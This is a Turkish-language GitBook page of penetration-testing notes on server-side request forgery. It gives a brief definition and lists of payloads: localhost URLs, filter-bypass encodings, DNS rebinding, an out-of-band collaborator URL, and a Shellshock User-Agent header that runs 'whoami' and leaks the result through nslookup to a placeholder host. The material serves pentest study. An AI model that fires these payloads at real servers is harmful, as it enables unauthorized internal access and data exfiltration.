🖥️
Siber Güvenlik Notları
  • WHOAMI
    • 👨‍💻Who Am I?
  • 🔭Information Gathering
    • Pentest VM Setup
    • Passive Information Gathering
    • Subdomain Enumeration
    • Host Discovery
    • Port Scanning
    • Email Enumeration
    • Leaked Passwords
    • Zafiyet Araştırma
  • 🪟Windows Pentesting
    • Windows Privilege Escalation
    • Windows Persistence
    • Windows Lateral Movement
    • AV Evasion
  • 🐧Linux Pentesting
    • Linux Privilege Escalation
    • Linux Persistence
    • Linux Lateral Movement
  • 🕸️Web Application Pentesting
    • Web Pentest Checklist
    • SQL Injection
    • NoSQL Injection
    • OS Command Injection
    • XXE Injection
    • SSTI
    • XSS
    • CSRF
    • SSRF
    • LFI/RFI
    • Insecure Deserialization
    • CORS Misconfiguration
    • Directory Traversal
    • File Upload
    • Broken Authentication
    • Broken Access Control
    • Business Logic
    • Race Conditions
    • Web Cache Deception
    • AWS Testing
    • Web Cache Poisoning
    • Clickjacking
    • API Testing
    • Broken Link Hijacking
    • HTTP Request Smuggling
    • LLM
    • HTTP Host Header Attack
    • OAuth Zafiyetleri
    • GraphQL API
    • HTTP Parameter Pollution
    • Configuration and Deployment Management Testing
    • Information Disclosure
    • Prototype pollution
    • JWT
  • 🖲️Network Service Pentesting
    • 📘Active Directory Services
      • Bleeding Edge Vulns
      • Misconfigs
      • Domain Trust
      • DNS (53)
      • Kerberos (88)
      • LDAP (389,636)
      • RPC WMI (135)
      • SMB (445)
      • WinRM - 5985
    • 📂FTP - 21
    • 🔐SSH - 22
    • 🤣Telnet - 23
    • SMTP - 25
    • TFTP - 69 UDP
    • HTTP - 80,443
      • Apache
      • Joomla
      • Drupal
      • Wordpress
      • WEBDAV
      • PHP
      • Laravel
    • IMAP/POP3 - 110,143,993,995
    • SNMP - 161
    • Rservices - 512
    • IPMI - 623
    • Rsync - 873
    • MSSQL - 1433
    • Oracle TNS - 1521
    • NFS - 2049
    • Docker
    • Grafana - 3000
    • MySQL - 3306
    • RDP - 3389
    • Postgresql - 5432
    • Redis - 6379
    • JDWP - 8000
    • MongoDB - 27017
  • 🕸️Network Pentesting
    • ARP Poisoning
  • 📞Android Pentesting
    • Android Derleme Süreci
    • Reversing
    • Rooting
    • Burp Suite Sertifikası
    • SSL Pinning Bypass
    • Patching
    • MobSF Kurulumu
    • Flutter Pentesting
  • 📰Teori
    • Güvenlik Ürünleri
    • OSI
    • Security Principles
  • Diger
    • Hacking Gadgets
      • Wifi Pineapple
      • Pwnagotchi
    • Stego
    • Buffer Overflow
    • Phishing
    • Nessus
    • DDOS Attacks
    • MSFConsole
  • ⏪Reverse
    • GCC Reverse
    • Python Reverse
    • Flare VM
    • Remnux
  • 🛜Wireless Pentesting
    • Wireless Pentest
    • Wireless V2
Powered by GitBook
On this page
  • SSRF Nedir?
  • Yöntemler
  • Basit SSRF
  • Blacklist Bypass
  • Whitelist Bypass
  • Out of Band SSRF
  • Open Redirect SSRF
  • DNS Rebinding SSRF
  • Shellshock
  • Kaynaklar

Was this helpful?

  1. Web Application Pentesting

SSRF

PreviousCSRFNextLFI/RFI

Last updated 19 days ago

Was this helpful?

SSRF Nedir?

  • Server Side Request Forgery, bir saldırganın sunucu tarafı uygulamasının istenmeyen bir konuma istekte bulunmasına olan bir web güvenlik açığıdır.

  • Bir SSRF saldırısında, saldırgan sunucunun kuruluşun altyapısındaki yalnızca dahili hizmetlere bağlantı kurmasına neden olabilir. Diğer durumlarda, sunucuyu rastgele harici sistemlere bağlanmaya zorlayabilirler. Bu, yetkilendirme kimlik bilgileri gibi hassas verilerin sızmasına neden olabilir.

Yöntemler

Basit SSRF

http://localhost:80
http://127.0.0.1:80
http://0.0.0.0:80

Blacklist Bypass

http://0/
http://127.1
http://127.0.1
http://2130706433/

Whitelist Bypass

http://127.0.0.1#@example.com
http://127.0.0.1%2523@example.com

Out of Band SSRF

http://COLLABORATOR

Open Redirect SSRF

http://example.com?redirect=127.0.0.1

DNS Rebinding SSRF

http://7f000001.7f000001.rbndr.us

Shellshock

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).COLLABORATOR

Kaynaklar

Rebinder:

Nip:

Portswigger Academy:

Bypass Metodları:

🕸️
https://lock.cmpxchg8b.com/rebinder.html
https://nip.io/
https://portswigger.net/web-security/ssrf
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet